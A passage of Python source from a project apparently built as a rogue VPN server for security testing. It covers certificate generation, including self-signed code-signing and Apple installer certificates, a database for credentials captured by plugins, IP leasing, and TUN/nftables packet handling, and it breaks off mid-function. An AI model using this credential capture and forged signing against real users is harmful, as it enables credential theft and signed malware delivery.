        key_usage = x509.KeyUsage(
            digital_signature=True,
            key_encipherment=False,
            content_commitment=False,
            data_encipherment=False,
            key_agreement=False,
            encipher_only=False,
            decipher_only=False,
            key_cert_sign=False,
            crl_sign=False
        )

        # NOTE(review): uses deprecated datetime.datetime.utcnow() while
        # generate_ca_certificate() uses timezone-aware now(timezone.utc);
        # behavior is equivalent but inconsistent.
        cert = x509.CertificateBuilder().subject_name(
            subject
        ).issuer_name(
            self.ca_cert.subject
        ).public_key(
            cert_key.public_key()
        ).serial_number(
            x509.random_serial_number()
        ).not_valid_before(
            # backdate one day to tolerate clock skew on clients
            datetime.datetime.utcnow() - datetime.timedelta(days=1)
        ).not_valid_after(
            datetime.datetime.utcnow() + datetime.timedelta(days=365)
        ).add_extension(
            x509.SubjectAlternativeName(san_list),
            critical=False,
        ).add_extension(
            x509.ExtendedKeyUsage(eku_list),
            critical=True,
        ).add_extension(
            key_usage,
            critical=True,
        ).sign(self.ca_key, hashes.SHA256(), default_backend())

        # Convert certificate and key to PEM format
        cert_pem = cert.public_bytes(serialization.Encoding.PEM)
        key_pem = cert_key.private_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PrivateFormat.TraditionalOpenSSL,
            encryption_algorithm=serialization.NoEncryption()
        )

        # Leaf + CA concatenated so servers can present the full chain
        with open(cert_path, 'wb') as cert_file:
            cert_file.write(cert_pem + self.ca_cert.public_bytes(serialization.Encoding.PEM))
        with open(key_path, 'wb') as key_file:
            key_file.write(key_pem)
        return cert_path, key_path

    def generate_ca_certificate(self):
        """Load the CA certificate/key from disk, or generate a new self-signed CA.

        Sets self.ca_cert / self.ca_key and returns (ca_key_path, ca_cert_path).
        """
        self.ca_key_path = os.path.join(self.cert_dir, 'ca.key')
        self.ca_cert_path = os.path.join(self.cert_dir, 'ca.crt')

        # Check if CA cert already exists
        if os.path.exists(self.ca_cert_path) and os.path.exists(self.ca_key_path):
            logging.info("Loading existing CA certificate")
            with open(self.ca_cert_path, 'rb') as f:
                self.ca_cert = x509.load_pem_x509_certificate(f.read(), default_backend())
            with open(self.ca_key_path, 'rb') as f:
                self.ca_key = serialization.load_pem_private_key(f.read(), password=None, backend=default_backend())
            return self.ca_key_path, self.ca_cert_path

        logging.info("Generating new CA certificate")

        # Generate CA private key
        self.ca_key = rsa.generate_private_key(
            public_exponent=65537,
            key_size=2048,
            backend=default_backend()
        )

        # Build CA certificate (self-signed: issuer == subject)
        subject = x509.Name([
            x509.NameAttribute(NameOID.COMMON_NAME, self.ca_common_name),
            #x509.NameAttribute(NameOID.ORGANIZATION_NAME, self.ca_common_name),
        ])
        self.ca_cert = x509.CertificateBuilder().subject_name(
            subject
        ).issuer_name(
            subject
        ).public_key(
            self.ca_key.public_key()
        ).serial_number(
            x509.random_serial_number()
        ).not_valid_before(
            # backdate one day to tolerate clock skew
            datetime.datetime.now(datetime.timezone.utc) - datetime.timedelta(days=1)
        ).not_valid_after(
            # ~10 year CA lifetime
            datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=3650)
        ).add_extension(
            x509.BasicConstraints(ca=True, path_length=None),
            critical=True
        ).add_extension(
            x509.SubjectKeyIdentifier.from_public_key(self.ca_key.public_key()),
            critical=False
        ).add_extension(
            x509.AuthorityKeyIdentifier.from_issuer_public_key(self.ca_key.public_key()),
            critical=False
        ).sign(self.ca_key, hashes.SHA256(), default_backend())

        # Save CA cert and key (key is written unencrypted)
        with open(self.ca_cert_path, 'wb') as f:
            f.write(self.ca_cert.public_bytes(serialization.Encoding.PEM))
        with open(self.ca_key_path, 'wb') as f:
            f.write(self.ca_key.private_bytes(
                encoding=serialization.Encoding.PEM,
                format=serialization.PrivateFormat.TraditionalOpenSSL,
                encryption_algorithm=serialization.NoEncryption()
            ))
        return self.ca_key_path, self.ca_cert_path

    def generate_codesign_certificate(self, common_name, pfx_path=None, cert_path=None, key_path=None):
        """Create (or reuse) a CA-signed code-signing certificate.

        Writes PEM cert, PEM key and a PKCS#12 bundle; returns the pfx path.
        Existing files are reused when cert_is_valid() accepts them.
        """
        if not self.ca_cert or not self.ca_key:
            self.load_ca_certificate()

        if pfx_path is None:
            pfx_path = os.path.join(self.cert_dir, 'codesign.pfx')
        if cert_path is None:
            cert_path = os.path.join(self.cert_dir, 'codesign.cer')
        if key_path is None:
            key_path = os.path.join(self.cert_dir, 'codesign.key')

        if os.path.exists(cert_path) and os.path.exists(key_path) and \
                os.path.exists(pfx_path) and self.cert_is_valid(cert_path, common_name):
            logging.info(f"Loading existing codesigning certificate for: {common_name}")
            return pfx_path
        else:
            logging.info(f"Generating new codesigning certificate for: {common_name}")

        # Generate a private key for the code signing certificate
        codesign_private_key = rsa.generate_private_key(
            public_exponent=65537,
            key_size=2048,
            backend=default_backend()
        )

        # Create the code signing certificate
        subject = x509.Name([
            x509.NameAttribute(NameOID.COMMON_NAME, common_name)
        ])
        eku_list = [
            ExtendedKeyUsageOID.CODE_SIGNING,
        ]
        key_usage = x509.KeyUsage(
            digital_signature=True,
            key_encipherment=False,
            content_commitment=False,
            data_encipherment=False,
            key_agreement=False,
            encipher_only=False,
            decipher_only=False,
            key_cert_sign=False,
            crl_sign=False
        )
        builder = x509.CertificateBuilder().subject_name(
            subject
        ).issuer_name(
            self.ca_cert.subject
        ).public_key(
            codesign_private_key.public_key()
        ).serial_number(
            x509.random_serial_number()
        ).not_valid_before(
            datetime.datetime.now(datetime.timezone.utc) - datetime.timedelta(days=1)
        ).not_valid_after(
            datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(days=365)
        ).add_extension(
            x509.ExtendedKeyUsage(eku_list),
            critical=True,
        ).add_extension(
            key_usage,
            critical=True,
        )

        # Sign the certificate with the CA private key
        codesign_certificate = builder.sign(self.ca_key, hashes.SHA256(), default_backend())

        # Save the new certificate to a file
        with open(cert_path, 'wb') as f:
            f.write(codesign_certificate.public_bytes(serialization.Encoding.PEM))
        with open(key_path, 'wb') as f:
            f.write(codesign_private_key.private_bytes(
                encoding=serialization.Encoding.PEM,
                format=serialization.PrivateFormat.TraditionalOpenSSL,
                encryption_algorithm=serialization.NoEncryption()
            ))

        # Convert to pkcs12 and save to codesign.pfx
        logging.info(f"Saving codesigning certificate to {pfx_path}")
        with open(pfx_path, "wb") as f:
            f.write(serialization.pkcs12.serialize_key_and_certificates(
                b"codesign", codesign_private_key, codesign_certificate,
                None, serialization.NoEncryption()
            ))
        return pfx_path

    def generate_apple_certificate(self, common_name="Developer ID Installer", cert_path=None, key_path=None):
        """Generate an Apple code signing certificate.

        Returns (cert_path, key_path) of the PEM-encoded cert and key.

        NOTE(review): unlike the other generators, this method dereferences
        self.ca_cert/self.ca_key without first calling load_ca_certificate();
        callers must ensure the CA is loaded — confirm against call sites.
        """
        if cert_path is None:
            cert_path = os.path.join(self.cert_dir, 'apple.cer')
        if key_path is None:
            key_path = os.path.join(self.cert_dir, 'apple.key')

        # Generate a private key
        apple_private_key = rsa.generate_private_key(
            public_exponent=65537,
            key_size=2048,
            backend=default_backend()
        )

        # Create Apple signing certificate
        subject = x509.Name([
            x509.NameAttribute(NameOID.COMMON_NAME, common_name)
        ])

        # list of EKUs
        # NOTE(review): OID 1.2.840.113635.100.6.1.14 appears twice in this
        # list (labelled both "Installer" and "Extension Signing") — likely a
        # copy/paste slip; verify intended OIDs against Apple's OID registry.
        eku_list = [
            ExtendedKeyUsageOID.CODE_SIGNING,
            ObjectIdentifier("1.2.840.113635.100.6.1.14"),  # Apple Developer ID Installer
            ObjectIdentifier("1.2.840.113635.100.4.13"),    # Apple Package Signing
            ObjectIdentifier("1.2.840.113635.100.6.1.14"),  # Apple Extension Signing
        ]
        key_usage = x509.KeyUsage(
            digital_signature=True,
            key_encipherment=False,
            content_commitment=False,
            data_encipherment=False,
            key_agreement=False,
            encipher_only=False,
            decipher_only=False,
            key_cert_sign=False,
            crl_sign=False
        )
        builder = x509.CertificateBuilder().subject_name(
            subject
        ).issuer_name(
            self.ca_cert.subject
        ).public_key(
            apple_private_key.public_key()
        ).serial_number(
            x509.random_serial_number()
        ).not_valid_before(
            datetime.datetime.utcnow() - datetime.timedelta(days=1)
        ).not_valid_after(
            datetime.datetime.utcnow() + datetime.timedelta(days=365)
        ).add_extension(
            x509.ExtendedKeyUsage(eku_list),
            critical=True,
        ).add_extension(
            key_usage,
            critical=True,
        )

        # Sign the certificate with the CA private key
        apple_certificate = builder.sign(self.ca_key, hashes.SHA256(), default_backend())

        # Save the new certificate to a file
        with open(cert_path, 'wb') as f:
            f.write(apple_certificate.public_bytes(serialization.Encoding.PEM))

        # Save the private key
        with open(key_path, 'wb') as f:
            f.write(apple_private_key.private_bytes(
                encoding=serialization.Encoding.PEM,
                format=serialization.PrivateFormat.TraditionalOpenSSL,
                encryption_algorithm=serialization.NoEncryption()
            ))
        return cert_path, key_path
================================================ FILE: src/nachovpn/core/db_manager.py ================================================
from datetime import datetime
import sqlite3
import logging
import json
import threading


class DBManager:
    """Thread-safe SQLite store for credentials captured by plugins."""

    def __init__(self, db_path='database.db'):
        self.db_path = db_path
        self.conn = None
        # serializes writes from plugin threads (single shared connection)
        self.lock = threading.Lock()
        self.setup_database()

    def setup_database(self):
        """Initialize the database connection and create tables if they don't exist."""
        try:
            # check_same_thread=False: the one connection is shared across
            # threads, guarded by self.lock for writes
            self.conn = sqlite3.connect(self.db_path, check_same_thread=False)
            cursor = self.conn.cursor()
            cursor.execute('''
                CREATE TABLE IF NOT EXISTS credentials (
                    timestamp DATETIME DEFAULT CURRENT_TIMESTAMP,
                    username TEXT,
                    password TEXT,
                    other TEXT,
                    plugin TEXT
                )
            ''')
            self.conn.commit()
            logging.info(f"Database initialized successfully at {self.db_path}")
        except sqlite3.Error as e:
            logging.error(f"Database initialization error: {e}")
            raise

    def log_credentials(self, username, password, plugin_name, other_data=None):
        """Log credentials using prepared statements.

        other_data, if given, is JSON-serialized into the 'other' column.
        Errors are logged and swallowed (best-effort capture).
        """
        try:
            with self.lock:
                cursor = self.conn.cursor()
                cursor.execute(
                    'INSERT INTO credentials (username, password, other, plugin) VALUES (?, ?, ?, ?)',
                    (username, password, json.dumps(other_data) if other_data else None, plugin_name)
                )
                self.conn.commit()
        except sqlite3.Error as e:
            logging.error(f"Error logging credentials: {e}")

    def close(self):
        """Close the database connection."""
        if self.conn:
            with self.lock:
                self.conn.close()


================================================ FILE: src/nachovpn/core/ip_manager.py ================================================
from __future__ import annotations
import ipaddress, itertools, threading, time, os

# lease lifetime in seconds; override via env var
LEASE_SECS = int(os.getenv("LEASE_SECS", 5 * 60))
VPN_SUBNET = "10.10.0.0/16"


class IPPool:
    """Round-robin allocator with lease/idle-timeout."""

    def __init__(self, cidr: str = VPN_SUBNET):
        self.net = ipaddress.ip_network(cidr)
        # endless round-robin over all host addresses in the subnet
        self.host_iter = itertools.cycle(self.net.hosts())
        self.lock = threading.Lock()
        # ip_str -> last_seen_epoch
        self.inuse: dict[str, float] = {}
        # Reserve gateway (first host): lease of +inf so it never expires
        gw = str(next(self.host_iter))
        self.inuse[gw] = float('inf')

    def alloc(self) -> str:
        """Allocate a free (or lease-expired) address; raises RuntimeError when exhausted."""
        now = time.time()
        with self.lock:
            # at most one full cycle over the usable hosts (minus network/bcast)
            for _ in range(self.net.num_addresses - 2):
                cand = str(next(self.host_iter))
                last = self.inuse.get(cand, 0)
                if now - last > LEASE_SECS:
                    self.inuse[cand] = now
                    return cand
            raise RuntimeError("Address pool exhausted")

    def touch(self, ip: str):
        """Call whenever we see traffic from ip to keep the lease alive."""
        with self.lock:
            if ip in self.inuse:
                self.inuse[ip] = time.time()

    def release(self, ip: str):
        """Return ip to the pool immediately."""
        with self.lock:
            self.inuse.pop(ip, None)


================================================ FILE: src/nachovpn/core/packet_handler.py ================================================
from pyroute2 import AsyncIPRoute
from dataclasses import dataclass, field
from nachovpn.core.ip_manager import IPPool
from scapy.layers.l2 import Ether
from scapy.packet import Raw
from scapy.utils import PcapWriter
import nftables
import asyncio
import os
import logging
import ipaddress
import socket
import time
import uuid
import struct
import fcntl
import threading

TUNNEL_MTU = int(os.getenv("TUNNEL_MTU", 1400))
LEASE_SECS = int(os.getenv("LEASE_SECS", 5 * 60))  # 5 minutes
LEASE_CLEANUP_INTERVAL = int(os.getenv("LEASE_CLEANUP_INTERVAL", 60))  # 1 minute
VPN_SUBNET = "10.10.0.0/16"

# Tunnel forwarding control
TUNNEL_PRIVATE = os.getenv("TUNNEL_PRIVATE", "false").lower() == "true"
TUNNEL_FULL = os.getenv("TUNNEL_FULL", "false").lower() == "true"
# TUN/nftables require Linux-style networking; disabled on Windows
TUNNEL_ENABLED = (TUNNEL_PRIVATE or TUNNEL_FULL) and os.name != 'nt'

# Linux TUN ioctl constants (linux/if_tun.h)
IFF_NO_PI = 0x1000
TUNSETIFF = 0x400454CA
IFF_TUN = 0x0001


@dataclass
class ClientInfo:
    """Information about a connected client"""
    sock: socket.socket          # transport socket back to the VPN client
    ip_address: str              # address leased from IPPool
    connection_id: str           # uuid4 string assigned at session creation
    callback: callable           # plugin wrapper applied to outbound packets
    last_seen: float = field(default_factory=time.time)


class PacketHandler:
    """
    TUN-based packet handler using nftables
    """
    def __init__(self, write_pcap=False,
                 pcap_filename=None):
        """Initialize packet handler"""
        self.logger = logging.getLogger(__name__)
        self.write_pcap = write_pcap
        self.pcap_filename = pcap_filename
        self._pcap_writer = None
        self.logger.debug(f"[TUN] PacketHandler instantiated in thread {threading.current_thread().name}")

        # Initialize pyroute2 and nftables
        self._ipr = AsyncIPRoute()
        self.nft = nftables.Nftables()

        # TUN interface name
        self.tun_name = "nacho0"

        # Client management
        self.clients = {}  # ip_address -> ClientInfo
        self.conn_to_ip = {}  # connection_id -> ip_address
        self.ip_pool = IPPool(VPN_SUBNET)
        self.client_lock = asyncio.Lock()
        self.connection_states = {}  # connection_id -> bool (True if connection is alive)

        # Packet queuing
        self.packet_queues = {}  # connection_id -> asyncio.Queue
        self.send_tasks = {}  # connection_id -> asyncio.Task

        # Cache TUN file descriptor
        self.tun_fd = None

        # Background tasks
        self._lease_cleanup_task = None
        self._closed = False

    def _setup_nftables(self):
        """Configure nftables rules.

        Builds the 'inet vpn' table: input/forward/nat chains, an allowance
        for TCP 445 to the gateway (SMB share), default-drop otherwise, and —
        when TUNNEL_FULL — internet forwarding with masquerading while
        blocking private/LAN, link-local metadata and multicast destinations.
        """
        try:
            # First try to flush and delete existing table
            try:
                self.nft.cmd('flush table inet vpn')
                self.nft.cmd('delete table inet vpn')
                self.logger.info("Flushed existing nftables rules")
            except Exception as e:
                self.logger.warning(f"Error flushing existing rules: {e}")

            # MSS clamp to TUNNEL_MTU
            tcp_mss = TUNNEL_MTU

            # Get the gateway IP (first host in the subnet)
            subnet = ipaddress.ip_network(VPN_SUBNET)
            gateway_ip = str(next(subnet.hosts()))

            # Get addr / len from VPN_SUBNET
            vpn_addr, vpn_len = VPN_SUBNET.split("/")

            # Log the tunnel forwarding configuration
            self.logger.info(f"Tunnel forwarding configuration: TUNNEL_PRIVATE={TUNNEL_PRIVATE}, TUNNEL_FULL={TUNNEL_FULL}")

            # Build nftables rules (libnftables JSON API; rule order matters:
            # the 445-accept must precede the default input drop)
            rules = [
                {"add": {"table": {"family": "inet", "name": "vpn"}}},
                {"add": {"chain": {"family": "inet", "table": "vpn", "name": "input",
                                   "type": "filter", "hook": "input", "prio": 0, "policy": "accept"}}},
                {"add": {"chain": {"family": "inet", "table": "vpn", "name": "forward",
                                   "type": "filter", "hook": "forward", "prio": 0, "policy": "drop"}}},
                {"add": {"chain": {"family": "inet", "table": "vpn", "name": "postroute",
                                   "type": "nat", "hook": "postrouting", "prio": 100}}},
                {"add": {"chain": {"family": "inet", "table": "vpn", "name": "preroute",
                                   "type": "nat", "hook": "prerouting", "prio": -100}}},
                # Allow TCP 445 to gateway IP from VPN subnet
                {"add": {"rule": {"family": "inet", "table": "vpn", "chain": "input", "expr": [
                    {"match": {"left": {"meta": {"key": "iifname"}}, "op": "==", "right": self.tun_name}},
                    {"match": {"left": {"payload": {"protocol": "ip", "field": "saddr"}}, "op": "in",
                               "right": {"prefix": {"addr": vpn_addr, "len": int(vpn_len)}}}},
                    {"match": {"left": {"payload": {"protocol": "ip", "field": "daddr"}}, "op": "==", "right": gateway_ip}},
                    {"match": {"left": {"payload": {"protocol": "tcp", "field": "dport"}}, "op": "==", "right": 445}},
                    {"accept": None}
                ]}}},
                # Default drop for all other VPN interface traffic
                {"add": {"rule": {"family": "inet", "table": "vpn", "chain": "input", "expr": [
                    {"match": {"left": {"meta": {"key": "iifname"}}, "op": "==", "right": self.tun_name}},
                    {"drop": None}
                ]}}},
                # Accept established/related
                {"add": {"rule": {"family": "inet", "table": "vpn", "chain": "forward", "expr": [
                    {"match": {"left": {"ct": {"key": "state"}}, "op": "in",
                               "right": {"set": ["established", "related"]}}},
                    {"accept": None}
                ]}}},
                # Drop traffic to the gateway IP
                {"add": {"rule": {"family": "inet", "table": "vpn", "chain": "forward", "expr": [
                    {"match": {"left": {"payload": {"protocol": "ip", "field": "daddr"}}, "op": "==", "right": gateway_ip}},
                    {"drop": None}
                ]}}}
            ]

            # Add forwarding rules if TUNNEL_FULL is enabled
            if TUNNEL_FULL:
                self.logger.info("Adding internet forwarding rules - VPN clients can access the internet")

                # Drop traffic to private/LAN ranges
                # (also blocks the cloud metadata endpoint 169.254.169.254)
                rules.append({
                    "add": {"rule": {"family": "inet", "table": "vpn", "chain": "forward", "expr": [
                        {"match": {"left": {"payload": {"protocol": "ip", "field": "daddr"}}, "op": "in",
                                   "right": {"set": [
                                       {"prefix": {"addr": "10.0.0.0", "len": 8}},
                                       {"prefix": {"addr": "127.0.0.0", "len": 8}},
                                       {"prefix": {"addr": "169.254.169.254", "len": 32}},
                                       {"prefix": {"addr": "172.16.0.0", "len": 12}},
                                       {"prefix": {"addr": "192.168.0.0", "len": 16}}
                                   ]}}},
                        {"drop": None}
                    ]}}
                })

                # Drop broadcast and multicast traffic
                rules.append({
                    "add": {"rule": {"family": "inet", "table": "vpn", "chain": "forward", "expr": [
                        {"match": {"left": {"payload": {"protocol": "ip", "field": "daddr"}}, "op": "in",
                                   "right": {"set": [
                                       {"prefix": {"addr": "224.0.0.0", "len": 4}},
                                       {"prefix": {"addr": "255.255.255.255", "len": 32}}
                                   ]}}},
                        {"drop": None}
                    ]}}
                })

                # Accept all other VPN client traffic to the internet
                rules.append({
                    "add": {"rule": {"family": "inet", "table": "vpn", "chain": "forward", "expr": [
                        {"match": {"left": {"meta": {"key": "iifname"}}, "op": "==", "right": self.tun_name}},
                        {"accept": None}
                    ]}}
                })

                # Masquerade traffic from VPN subnet
                rules.append({
                    "add": {"rule": {"family": "inet", "table": "vpn", "chain": "postroute", "expr": [
                        {"match": {"left": {"payload": {"protocol": "ip", "field": "saddr"}}, "op": "in",
                                   "right": {"prefix": {"addr": vpn_addr, "len": int(vpn_len)}}}},
                        {"match": {"left": {"meta": {"key": "oifname"}}, "op": "!=", "right": self.tun_name}},
                        {"masquerade": None}
                    ]}}
                })
            else:
                self.logger.info("Internet forwarding disabled - VPN clients can only access SMB share")

            cmd = {"nftables": rules}

            # Apply nftables rules
            rc, _, err = self.nft.json_cmd(cmd)
            if rc:
                raise RuntimeError(f"Failed to apply nftables rules: {err}")
            self.logger.info("Configured nftables rules")

            # Check if IP forwarding is enabled
            try:
                with open('/proc/sys/net/ipv4/ip_forward', 'r') as f:
                    ip_forward = f.read().strip()
                    if ip_forward != '1':
                        self.logger.error(f"IP forwarding is not enabled. Please enable it with: sudo sysctl -w net.ipv4.ip_forward=1")
                self.logger.info("IP forwarding is enabled")
            except FileNotFoundError:
                self.logger.error("Cannot read IP forwarding status from /proc/sys/net/ipv4/ip_forward. Please ensure IP forwarding is enabled with: sudo sysctl -w net.ipv4.ip_forward=1")

            # Add MSS clamping rules (both directions on the TUN interface)
            try:
                self.nft.cmd(f'add rule inet vpn forward iifname {self.tun_name} ip saddr 10.10.0.0/16 tcp flags syn tcp option maxseg size set {tcp_mss}')
                self.nft.cmd(f'add rule inet vpn forward oifname {self.tun_name} ip daddr 10.10.0.0/16 tcp flags syn tcp option maxseg size set {tcp_mss}')
                self.logger.info(f"Added TCP MSS clamping rules with MSS {tcp_mss}")
            except Exception as e:
                self.logger.error(f"Failed to add TCP MSS clamping rules: {e}")
                raise

            # Verify rules were applied
            try:
                result = self.nft.cmd('list ruleset')
                self.logger.debug(f"Current nftables rules: {result}")
            except Exception as e:
                self.logger.error(f"Failed to list rules: {e}")

        except Exception as e:
            self.logger.error(f"Failed to configure nftables: {e}")
            raise

    async def _setup_tun_interface(self):
        """Create and configure the TUN interface.

        Removes any stale interface of the same name, creates a fresh tun
        device, sets MTU, brings it up, assigns the gateway address, and
        disables IPv6 on it.
        """
        try:
            idx = await self._ipr.link_lookup(ifname=self.tun_name)
            if idx:
                self.logger.info("Removing existing interface %s", self.tun_name)
                await self._ipr.link("del", index=idx[0])

            # Create TUN interface
            await self._ipr.link(
                "add",
                ifname=self.tun_name,
                kind="tuntap",
                mode="tun",
                iflags=IFF_TUN | IFF_NO_PI
            )

            # Get interface info
            idx = (await self._ipr.link_lookup(ifname=self.tun_name))[0]
            info = await self._ipr.link("get", index=idx)
            self.logger.debug(f"[TUN] Interface created with flags: {info[0]['flags']}")

            # Set MTU
            await self._ipr.link("set", index=idx, mtu=TUNNEL_MTU, state="up")
            self.logger.info(f"[TUN] Set interface MTU to {TUNNEL_MTU} bytes")

            # Gateway = first host address of the VPN subnet
            subnet = ipaddress.ip_network(VPN_SUBNET)
            gateway_ip = str(next(subnet.hosts()))
            await self._ipr.addr("add", index=idx, address=gateway_ip, prefixlen=subnet.prefixlen)
            self.logger.info("Created %s %s/%s", self.tun_name, gateway_ip, subnet.prefixlen)

            # Disable IPv6 on the nacho0 interface
            ipv6_disable_path = f"/proc/sys/net/ipv6/conf/{self.tun_name}/disable_ipv6"
            if os.path.exists(ipv6_disable_path):
                try:
                    with open(ipv6_disable_path, "w") as f:
                        f.write("1\n")
                    self.logger.info(f"Disabled IPv6 on {self.tun_name}")
                except Exception as e:
                    self.logger.warning(f"Failed to disable IPv6 on {self.tun_name}: {e}")
        except Exception:
            self.logger.exception("Failed to create TUN interface")
            raise

    def _setup_tun_fd(self) -> None:
        """Open /dev/net/tun and bind it to the nacho0 interface."""
        try:
            # Open the TUN character device (non-blocking so reads/writes
            # never stall the event loop)
            fd = os.open("/dev/net/tun", os.O_RDWR | os.O_NONBLOCK)
            self.logger.debug(f"[TUN] Opened /dev/net/tun with fd={fd}")

            # Tell the kernel which interface this fd belongs to
            ifr = struct.pack(
                "16sH",
                self.tun_name.encode(),
                IFF_TUN | IFF_NO_PI
            )
            self.logger.debug(f"[TUN] Setting interface flags: IFF_TUN={IFF_TUN}, IFF_NO_PI={IFF_NO_PI}")
            fcntl.ioctl(fd, TUNSETIFF, ifr)
            self.logger.debug(f"[TUN] Bound fd={fd} to interface {self.tun_name}")

            # Store and register with the event loop
            self.tun_fd = fd
            self._loop.add_reader(fd, self._on_tun_ready)
            self.logger.debug(f"[TUN] Registered fd={fd} with event loop")
        except Exception as e:
            self.logger.error(f"[TUN] Failed to open TUN file descriptor: {e}")
            raise

    def _on_tun_ready(self):
        """Synchronous callback when TUN fd is ready for reading"""
        try:
            self.logger.debug("[TUN] _on_tun_ready called")
            # Read packet from TUN interface (one read = one packet)
            packet_data = os.read(self.tun_fd, 65535)
            if not packet_data:
                self.logger.debug("[TUN] No data available")
                return

            self.logger.debug(f"[TUN] Raw packet data: {packet_data.hex()}")

            # Get IP version (high nibble of the first octet)
            version = packet_data[0] >> 4
            if version != 4:
                self.logger.debug(f"[TUN] Ignoring non-IPv4 packet: version={version}, first_bytes={packet_data[:4].hex()}")
                return

            # IPv4 packet: extract src/dst from the fixed header offsets
            if len(packet_data) >= 20:
                dest_ip = socket.inet_ntoa(packet_data[16:20])
                src_ip = socket.inet_ntoa(packet_data[12:16])
                self.logger.debug(f"[TUN] IPv4 packet: src={src_ip} dst={dest_ip} len={len(packet_data)}")
                if dest_ip:
                    self.logger.debug(f"[TUN] Handling reply packet for dest_ip={dest_ip}, src_ip={src_ip}, len={len(packet_data)}")
                    self._loop.create_task(self._handle_reply_packet(packet_data, dest_ip))
            else:
                self.logger.warning(f"[TUN] Packet too short for IPv4: len={len(packet_data)}")
        except BlockingIOError:
            # No data available
            pass
        except Exception as e:
            self.logger.error(f"[TUN] Error reading from TUN interface: {e}")

    async def _lease_cleanup(self):
        """Periodically check for and reclaim expired client leases"""
        while True:
            await asyncio.sleep(LEASE_CLEANUP_INTERVAL)
            try:
                async with self.client_lock:
                    now = time.time()
                    # Find stale clients (no traffic within LEASE_SECS)
                    stale = [
                        ip for ip, client in self.clients.items()
                        if now - client.last_seen > LEASE_SECS
                    ]
                    # Reclaim them
                    for ip in stale:
                        await self._reclaim_client(ip)
            except Exception as e:
                self.logger.error(f"Error in lease cleanup: {e}")

    async def _reclaim_client(self, ip_address):
        """Reclaim a client's resources.

        Drops mappings, closes the socket (best effort) and releases the IP
        back to the pool. Caller holds self.client_lock.
        """
        try:
            client = self.clients.pop(ip_address, None)
            if client:
                # Remove connection mapping
                self.conn_to_ip.pop(client.connection_id, None)

                # Close the socket
                try:
                    if hasattr(client, 'sock'):
                        client.sock.close()
                except Exception:
                    pass

                # Release the IP
                self.ip_pool.release(ip_address)
                self.logger.info(f"Reclaimed idle client {client.connection_id} with IP {ip_address}")
        except Exception as e:
            self.logger.error(f"Error reclaiming client {ip_address}: {e}")

    def _send_all_blocking(self, sock, data):
        """Send all bytes on a blocking socket."""
        try:
            # force blocking mode so sendall() completes the whole buffer;
            # run from an executor thread, not the event loop
            sock.setblocking(True)
            sock.sendall(data)
            return True
        except Exception as e:
            self.logger.error(f"Error sending data (blocking): {e}")
            return False

    async def _send_packets(self, connection_id, queue):
        """Background task to send packets from queue to client"""
        try:
            while True:
                # Get next packet from queue
                packet_data = await queue.get()
                if packet_data is None:  # Shutdown signal
                    break

                # Get client info
                ip_address = self.conn_to_ip.get(connection_id)
                if not ip_address:
                    self.logger.warning(f"[TUN] No IP address found for connection_id {connection_id} in _send_packets")
                    continue

                client = self.clients.get(ip_address)
                if not client:
                    self.logger.warning(f"[TUN] No client found for IP {ip_address} in _send_packets")
                    continue

                # Check if connection is still alive
                if not self.connection_states.get(connection_id, False):
                    self.logger.warning(f"[TUN] Connection {connection_id} is no longer alive in _send_packets")
                    continue

                self.logger.debug(f"[TUN] Sending reply packet of size {len(packet_data)} bytes to client {connection_id} (IP {ip_address})")
                try:
                    # blocking sendall is offloaded to the default executor
                    await self._loop.run_in_executor(
                        None,
                        self._send_all_blocking,
                        client.sock,
                        packet_data
                    )
                except Exception as e:
                    self.logger.error(f"[TUN] Failed to send data to client {connection_id}: {e}")
                    self.connection_states[connection_id] = False
                    self.destroy_session(connection_id)
                    break

                # Update client state under lock
                async with self.client_lock:
                    if ip_address in self.clients:
                        self.clients[ip_address].last_seen = time.time()
                        # Touch the IP to keep lease alive
                        self.ip_pool.touch(ip_address)
                        self.logger.debug(f"[TUN] Updated client {connection_id} last_seen time")

                # Mark task as done
                queue.task_done()
        except Exception as e:
            self.logger.error(f"[TUN] Error in send_packets task for {connection_id}: {e}")
            self.connection_states[connection_id] = False
            self.destroy_session(connection_id)

    def register_client(self, connection_id, sock, wrapper_callback):
        """Register a new client and assign an IP.

        NOTE(review): mutates self.clients/conn_to_ip without taking
        client_lock — presumably called from the event-loop thread only;
        confirm against callers.
        """
        try:
            # Allocate IP from pool
            ip_address = self.ip_pool.alloc()

            # Store client info
            self.clients[ip_address] = ClientInfo(
                sock=sock,
                ip_address=ip_address,
                connection_id=connection_id,
                callback=wrapper_callback,
                last_seen=time.time()
            )

            # Add connection mapping
            self.conn_to_ip[connection_id] = ip_address

            # Mark connection as alive
            self.connection_states[connection_id] = True

            # Create packet queue and start send task
            # (bounded queue: reply packets are dropped when the client can't
            # keep up, see _handle_reply_packet)
            self.packet_queues[connection_id] = asyncio.Queue(maxsize=100)
            self.send_tasks[connection_id] = self._loop.create_task(
                self._send_packets(connection_id, self.packet_queues[connection_id])
            )

            self.logger.info(f"Registered client {connection_id} with IP {ip_address}")
            return ip_address
        except Exception as e:
            self.logger.error(f"Failed to register client {connection_id}: {e}")
            raise

    def destroy_session(self, connection_id):
        """Unregister a client and release their IP"""
        ip_address = self.conn_to_ip.get(connection_id)
        if ip_address and ip_address in self.clients:
            # Remove connection mapping
            self.conn_to_ip.pop(connection_id, None)

            # Remove client info
            del self.clients[ip_address]

            # Remove connection state
            self.connection_states.pop(connection_id, None)

            # Clean up packet queue and send task
            queue = self.packet_queues.pop(connection_id, None)
            if queue:
                # Signal task to stop (None is the shutdown sentinel)
                self._loop.call_soon_threadsafe(queue.put_nowait, None)

            task = self.send_tasks.pop(connection_id, None)
            if task:
                task.cancel()

            # Release the IP
            self.ip_pool.release(ip_address)
            self.logger.info(f"Unregistered client {connection_id}")

    async def _handle_reply_packet(self, packet_data, dest_ip):
        """Handle a reply packet from the TUN interface.

        Looks up the client owning dest_ip, wraps the packet via the plugin's
        callback (if any) and enqueues it for the client's send task.
        """
        try:
            # Lookup client by IP
            client = self.clients.get(dest_ip)
            self.logger.debug(f"[TUN] Handling reply packet for dest_ip={dest_ip}, client={client}")
            if client:
                # Check if connection is still alive
                if not self.connection_states.get(client.connection_id, False):
                    self.logger.warning(f"[TUN] Connection {client.connection_id} is no longer alive, skipping packet")
                    return

                # Use the plugin's wrapper_callback
                if client.callback:
                    self.logger.debug(f"[TUN] Using callback for client {client.connection_id}")
                    wrapped_data = client.callback(packet_data, client)
                else:
